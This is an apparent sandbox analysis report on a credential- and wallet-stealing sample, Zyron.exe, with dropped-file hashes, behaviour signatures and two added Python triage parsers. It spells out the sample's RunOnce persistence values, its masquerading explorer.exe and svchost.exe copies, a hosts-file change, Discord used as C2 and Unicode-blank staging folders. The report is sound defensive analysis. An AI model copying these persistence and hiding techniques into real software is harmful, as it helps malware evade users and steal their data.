SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\VCouic5Wza.tmp

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Local\Temp\7hWgokbyp5.tmp

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

memory/3516-609-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/5688-619-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-627-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-631-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/5688-637-0x0000000000400000-0x000000000041F000-memory.dmp

memory/6004-636-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4852-635-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-639-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-649-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-648-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-640-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/3516-650-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/2384-660-0x0000000000400000-0x000000000041F000-memory.dmp

memory/5500-661-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1068-662-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3516-683-0x00000131DCDA0000-0x00000131DD2C2000-memory.dmp

memory/3516-698-0x00007FFF96710000-0x00007FFF9682B000-memory.dmp

memory/3516-703-0x00007FFF98570000-0x00007FFF9859D000-memory.dmp

memory/3516-702-0x00007FFFA89E0000-0x00007FFFA89EF000-memory.dmp

memory/3516-701-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

memory/3516-700-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-699-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-695-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/3516-697-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/3516-694-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-692-0x00007FFFA8600000-0x00007FFFA860D000-memory.dmp

memory/3516-691-0x00007FFF98FE0000-0x00007FFF98FF9000-memory.dmp

memory/3516-690-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/3516-689-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-696-0x00007FFF98940000-0x00007FFF98954000-memory.dmp

memory/3516-688-0x00007FFFA5DE0000-0x00007FFFA5DF9000-memory.dmp

memory/5964-731-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-732-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-733-0x00007FFFAB8C0000-0x00007FFFAB8CF000-memory.dmp

memory/5964-738-0x00007FFFA8260000-0x00007FFFA828D000-memory.dmp

memory/5964-739-0x00007FFFA8830000-0x00007FFFA8849000-memory.dmp

memory/5964-741-0x00007FFFA4070000-0x00007FFFA41E6000-memory.dmp

memory/5964-740-0x00007FFFA8230000-0x00007FFFA8254000-memory.dmp

memory/5964-742-0x00007FFFA8600000-0x00007FFFA8619000-memory.dmp

memory/5964-744-0x00007FFFA81F0000-0x00007FFFA8223000-memory.dmp

memory/5964-743-0x00007FFFA89E0000-0x00007FFFA89ED000-memory.dmp

memory/5964-745-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/5964-748-0x00007FFFA3FA0000-0x00007FFFA406D000-memory.dmp

memory/5964-747-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-746-0x000001DC89610000-0x000001DC89B32000-memory.dmp

memory/5964-749-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-751-0x00007FFFA83D0000-0x00007FFFA83DD000-memory.dmp

memory/5964-750-0x00007FFFA82E0000-0x00007FFFA82F4000-memory.dmp

memory/5964-752-0x00007FFF98380000-0x00007FFF9849B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\ResetUnpublish.png

MD5 aec16ac87172471c7af1ab3cda2b240b
SHA1 ec8decd2d8e05af3e3cccfce930ab714ca16b9f4
SHA256 c484be31f20604c6b152addaefe69d43893ef4260229ff0daad0a7164da6a50b
SHA512 bc8e750720c3ada40ba1b49053bc9caa37e5da489da1798348292356c3f04ccf4ace1129b7ca1dd51c6762277241456c37a4b370f547e256c4d4bff02312f64c

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\RequestInitialize.jpeg

MD5 c03b259b519d0cecf1c4e7ae9e7ead7b
SHA1 1e694d0157356072b253862594cc15ac0f27aa3b
SHA256 fce60de15fcb055bb5f01c00abc02eee74b7d0b06169193af3a9d09e57339139
SHA512 d637374a49bada8f6de08c65637bc3f0e473429ce1683b178b789fa86f87ac09a3d25c2f8ff39c7b021202f59827865dda77b25f07a434d7924f82a0cd80ebdc

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\InvokeEnter.txt

MD5 99f41db4a444fab85734295c87acc9bb
SHA1 627fbe23eeb350a6b7ca0e7dc0922a48731f9dd0
SHA256 0f61c37eb778f2749ce133b0fe4658206f35a1131141397e84b5c018b147c6ef
SHA512 2aeb1058d765fbb71add0931404eee93adf8b4c6f00837641472f45f5677a394088dabc4f0e93374e90326f1176bed75b37f7be1ec0a9be35ce688b2b61e26ed

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\UnpublishMerge.jpeg

MD5 adcddca390c3a5d15c1a725417a27501
SHA1 191b7209f424fb22289871bfb196e3e39db3e57d
SHA256 8ed834c991f20512dcea85ec51ce50d0d2b995174841a64d1127f7c29ea8dc88
SHA512 1ce7e4a85ea8c3a9cfbb6af43fcc95545f96261574859d90dddc8aa53487a26181fe2fac7809fe3782b3d3cf61f6dbbdfb0811d4dd565ebc2939670c12447bef

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\SuspendBackup.dxf

MD5 7f98877d72431ccb4b1fd807d3094511
SHA1 c1924541bbd60a8c1d5b8cf8e11ad6f842eb7b38
SHA256 545511179b6c39dd372aedbd285c3766d4a962545c19c6457de24f4899efe4ad
SHA512 d5a4092a2add5bfa4384552a9f580d3ce40957caf8a1f37e8e09bea4b7582de0a6f85f6cc4ca6b12868700f801f954bdce1ea139f17ee179136c6438b7fdfb48

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\StartSend.jpg

MD5 4f384e5b5202def2ce5431fbc6db0de8
SHA1 1ce64098267822b774e5b6aac22cb2a74fbcbbd5
SHA256 3b5a7a3c57d34deef444aed4320c1dca5ec21c796f5390bccffec5f105f3b0b5
SHA512 0f472a7b90971314c5c56e8efffcd99516f6481de3687af30d25b3e0be257a7633296bf0d71b207af5bd61de8757d1b81320a1b1b55e8cb7dfca20e9aeaa7dee

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\RegisterResume.png

MD5 1cf14c408b5901047f8fbf21d46c01f0
SHA1 c50660218e293f3763ca2edd864cc2ef79db0714
SHA256 0a06e5d7a796d6837c5076d1e529567dbfa0cf81b92c979d2701ba078027eb8d
SHA512 bf590aad46ce41cacb5f65b7fcf9fa66e383369b6634e7c4cc78e7ee0b50905c47d3ce85b8a7a631e395ffd451003a7408e61d58e96ed77e2b0f5961776949e8

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\MoveConvertTo.jpg

MD5 42a00df76e3797c3ca888468937938c1
SHA1 80df94d9c0db17a819b5b3343368732b411d6f4c
SHA256 e5467f3a8c78cf4e75f624b85511bf38a41541d7d4af4bdd6ac73c638fe5fa2f
SHA512 6f857c8d7e282111641692af5802f154a05e7a9a26776e6266d3f86424835ed66aaaa17d500b2d169ad88e51dfdcdd3f4cf06ee0183c04114c3b78d49647dcd9

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\GroupCheckpoint.jpg

MD5 0346bab1150745eebbbc4502c020cb97
SHA1 4fa57d4ab49fbf9d4ec5c95330550a662d83cc41
SHA256 4ac1e56f5f26294bb584e12516ae50b554626f12dc7a751a66cb82c2cf8b1827
SHA512 883f469ce35add49c693242b18f283f90c483054bea3d2d41e72d9542c300f189ed09df28f6c44c19c085fbf678f466cb46a8d4749aa3001ec87e382fc83bb02

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\CloseStart.jpg

MD5 8050b20937bf0cbd4cc565f7f93ef443
SHA1 b68d8467b7553e77d844e94d61233277394933a5
SHA256 98a6db0c1074c475bf8743906dfbeebc2eafdb49c3d2bb621c209dcd6b7ab0cd
SHA512 c149b2570641b9964e5fbf74148946b92ff18451667fae45f373a0282d3586b64d71387e09ae93657e0dfd8927697e2bb494a9c7bc71b24d29d4a927f2efadea

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Downloads\GetBackup.gif

MD5 824e0e594d416c7f4bb144bd5ccb95e1
SHA1 8f4e6247423f5886548653024499c636fc90df78
SHA256 77ee5fbb43ab8e8f4b36c7b5424bf12858037ff80098d4799c8f0d67167c0a7c
SHA512 1b902fe1eba10e1318abfb86d5eb9aeeb25293f59ced4963ea867f9ad0edfa230bafdb40d34b262e89cb0928e9249d5ea0e86559637e9e29e03c7b79d768e726

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Music\RequestBackup.lock

MD5 c4b25d8fa14aaa0dae74b50361720490
SHA1 35e8829d7ad47bb865e30d74e9fc5b2c1a5333e8
SHA256 556df17bc5d883db36b879a37340a580c06d7780ebb6893e8d671e6f91216331
SHA512 7a413bda2cc755371adafb67481f06d6524e72b49424493e7e747a2179aac7978ae8883f085ef8d8142e9d77920dac5b26269885b952e259358bdb3186175d85

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\‎   ‏‌  ‎ \Common Files\Pictures\ConvertBackup.wmf

MD5 d03ce26c77a573bd5b764627a6519fd2
SHA1 9badcac77466e4bbe5a2a6ff292971c6563d8676
SHA256 7ca287513b0d92300110636b2298cdd880f89eaa276590d0ccea0f32b1914c0c
SHA512 25b191c0fd78388ede01ae37ecd9a66bd5ab6dd3130736aff2555bfd9485b946820d6a88053d8d4a98a08d0842ba0b66cfeeed62627de19029cc5b1b8dd7a776

memory/4116-904-0x000002AFDB820000-0x000002AFDB828000-memory.dmp

memory/5964-940-0x00007FFFA8620000-0x00007FFFA8645000-memory.dmp

memory/5964-939-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/5964-955-0x00007FFFA4070000-0x00007FFFA41E6000-memory.dmp

memory/5964-954-0x00007FFFA8230000-0x00007FFFA8254000-memory.dmp

memory/4136-973-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3712-974-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 439b5e04ca18c7fb02cf406e6eb24167
SHA1 e0c5bb6216903934726e3570b7d63295b9d28987
SHA256 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512 d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8e20bf45a7f6b885b6813fe236a0e39a
SHA1 681783bfd0e62e9458ff36416cdd460f693e98d2
SHA256 9cf6530ca3741b42d00e5b8c2f8c3dd8f89e7c8d8d78d94ea088f4ed2f7e6154
SHA512 dd2cb90a5816edd782e8f062434a50ab006a10441c073f5a3ae8da96dd088a10503f23f4171016a02ffc48874f16ac7f06ebd66e35d7f7e288e99d1100c5e5e3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
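
The table above is the sandbox's dropped-file listing: one path line followed by its MD5, SHA1, SHA256 and SHA512, with memory-dump entries (memory/PID-N-start-end) interleaved and carrying no hashes. Two properties of the paths matter more than the hashes. The staging directory under Temp is named with Unicode format characters and spaces only, so it renders as blank in Explorer and in most log viewers, and the sample's own re-launched copies carry a trailing space in the file name. The parser below is an added example, not part of the report or of any sandbox tooling. It reads a listing in this layout into records, rejects digests of the wrong length, splits out memory regions with their size, and flags path components that display as blank. The embedded listing is a constructed excerpt: the three entries are copied from the table above, but the invisible directory name is approximated with U+200E, U+200F and U+200C plus spaces, because the exact character sequence cannot be recovered from the rendered page.

```python
import re
import unicodedata
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (path, blank line, hash lines).
# The three entries are copied from the Files table above; the invisible
# directory name is an approximation (LRM, spaces, RLM, ZWNJ, spaces, LRM,
# space), not the exact character sequence from the sample.
SAMPLE_LISTING = (
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\BZuy8bjjGD.tmp\n"
    "\n"
    "MD5 349e6eb110e34a08924d92f6b334801d\n"
    "SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169\n"
    "SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a\n"
    "SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574\n"
    "\n"
    "memory/3516-609-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp\n"
    "\n"
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\\u200e   \u200f\u200c  \u200e "
    "\\Common Files\\Documents\\These.docx\n"
    "\n"
    "MD5 87cbab2a743fb7e0625cc332c9aac537\n"
    "SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7\n"
    "SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023\n"
    "SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa\n"
)

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


@dataclass
class Entry:
    path: str
    hashes: dict = field(default_factory=dict)


def parse_listing(text):
    """Read the path / hash-line layout into Entry records. Path lines are kept
    verbatim, not stripped: this family names files with trailing spaces and
    directories with invisible characters, and both matter for matching."""
    entries, current = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            algo, digest = m.groups()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path!r}")
            current.hashes[algo] = digest
        else:
            current = Entry(line)
            entries.append(current)
    return entries


def invisible_components(path):
    """Path components that render as blank: every character is whitespace or a
    Unicode format character (category Cf: U+200E LRM, U+200F RLM, U+200C ZWNJ, ...)."""
    return [c for c in re.split(r"[\\/]", path)
            if c and all(ch.isspace() or unicodedata.category(ch) == "Cf" for ch in c)]


def memory_region(path):
    """(pid, start address, size in bytes) for a memory-dump entry, else None."""
    m = MEM_RE.match(path)
    if not m:
        return None
    start, end = int(m.group(2), 16), int(m.group(3), 16)
    return int(m.group(1)), start, end - start


def triage(text):
    entries = parse_listing(text)
    return {
        "files": [(e.path, e.hashes.get("SHA256")) for e in entries if e.hashes],
        "hidden_dirs": sorted({c for e in entries for c in invisible_components(e.path)}),
        "regions": [r for r in (memory_region(e.path) for e in entries) if r],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LISTING).items():
        print(key, value)
```

Run it directly to print the findings, or pass the full listing to triage(). The hidden directory names are the output worth keeping: they describe how the family stages loot on disk, which is more durable across builds than the per-file hashes.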

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 17:16

Reported

2024-05-31 17:20

Platform

win11-20240426-en

Max time kernel

150s

Max time network

94s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

Signatures

Modifies visibility of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
(57 hits of this signature, every one logged as N/A N/A N/A N/A: the sandbox recorded no description, indicator, process or target for any of them)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A
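
The two registry signatures above, ShowSuperHidden set to 0 and the four RunOnce values, are worth reading together. The values are written under WOW6432Node, so by a 32-bit process; both point to copies named explorer.exe and svchost.exe that live under c:\windows\resources rather than where Windows keeps those binaries; and each of the two copies writes both values, so removing one binary or one value is not enough. ShowSuperHidden=0 is the Explorer default (protected operating-system files hidden); what the signature records is that a process under c:\windows\resources re-asserts it. The function below is an added example, not the sandbox's signature logic. It parses rows in the sandbox's "Set value" layout, converts the native \REGISTRY\MACHINE and \REGISTRY\USER prefixes to HKLM and HKU, flags any value under Run or RunOnce, and separately flags an image whose file name matches a Windows system binary but whose path is not one of that binary's canonical locations. The canonical-location table is an assumption for a default install, and the input rows are copied from the tables above.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: the five "Set value" rows from the two signature tables
# above, copied in the sandbox's row layout (description, indicator, process, target).
SAMPLE_EVENTS = [
    r'Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A',
]

EVENT_RE = re.compile(r'^Set value \((?P<kind>\w+)\) (?P<value>\S+) = "(?P<data>.*)" (?P<proc>\S+) N/A$')
AUTOSTART_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")

# Assumed canonical locations of the binaries this sample imitates (default
# install, lower-case, no \??\ prefix); extend the table for your own image.
CANONICAL = {
    "explorer.exe": {r"c:\windows\explorer.exe", r"c:\windows\syswow64\explorer.exe"},
    "svchost.exe": {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"},
    "spoolsv.exe": {r"c:\windows\system32\spoolsv.exe"},
}


def to_hive_path(value):
    """Turn the kernel-style REGISTRY value path into HKLM/HKU form."""
    value = re.sub(r"^\\REGISTRY\\MACHINE\\", r"HKLM\\", value, flags=re.IGNORECASE)
    return re.sub(r"^\\REGISTRY\\USER\\", r"HKU\\", value, flags=re.IGNORECASE)


def image_from_command(data):
    """First executable in a Run/RunOnce command string. The sandbox escapes
    backslashes in the recorded data, so undo that before parsing."""
    cmd = data.replace("\\\\", "\\")
    m = re.match(r'^"?(.+?\.exe)"?(?:\s|$)', cmd, re.IGNORECASE)
    return m.group(1).lower() if m else None


def triage_registry_event(line):
    """Findings for one row: autostart_value, masquerading_path, hide_system_files."""
    m = EVENT_RE.match(line)
    if not m:
        return []
    value, data, proc = m.group("value", "data", "proc")
    key, _, name = value.rpartition("\\")
    hive_value = to_hive_path(value)
    findings = []
    if key.lower().endswith(AUTOSTART_SUFFIXES):
        image = image_from_command(data)
        findings.append({"rule": "autostart_value", "value": hive_value, "image": image, "by": proc})
        base = PureWindowsPath(image).name if image else ""
        # A system binary's name at a non-canonical path is masquerading, whatever the process is called.
        if base in CANONICAL and image not in CANONICAL[base]:
            findings.append({"rule": "masquerading_path", "value": hive_value, "image": image, "by": proc})
    if name.lower() == "showsuperhidden" and key.lower().endswith("\\explorer\\advanced") and data == "0":
        findings.append({"rule": "hide_system_files", "value": hive_value, "image": None, "by": proc})
    return findings


def triage_registry_events(lines):
    return [f for line in lines for f in triage_registry_event(line)]


if __name__ == "__main__":
    for f in triage_registry_events(SAMPLE_EVENTS):
        print(f"{f['rule']:18} {f['value']}  image={f['image']}  by={f['by']}")
```

The masquerading check is the part to reuse: matching on the file name alone would pass these entries, since explorer.exe and svchost.exe are expected names in an autostart location, and only the path comparison exposes them.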

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A  (32 identical rows)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A  (20 identical rows)
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A  (12 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
(Rows reading "Token: 33" to "Token: 36" are privilege LUIDs the sandbox did not resolve to names; in winnt.h those values are SE_INC_WORKING_SET_PRIVILEGE (33), SE_TIME_ZONE_PRIVILEGE (34), SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35) and SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36). The same 21-privilege sequence repeats once per WMIC.exe run and the table stops part-way through the third repeat, so those rows describe privileges WMIC.exe enables for itself at start-up, not privileges the sample requested directly.)
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
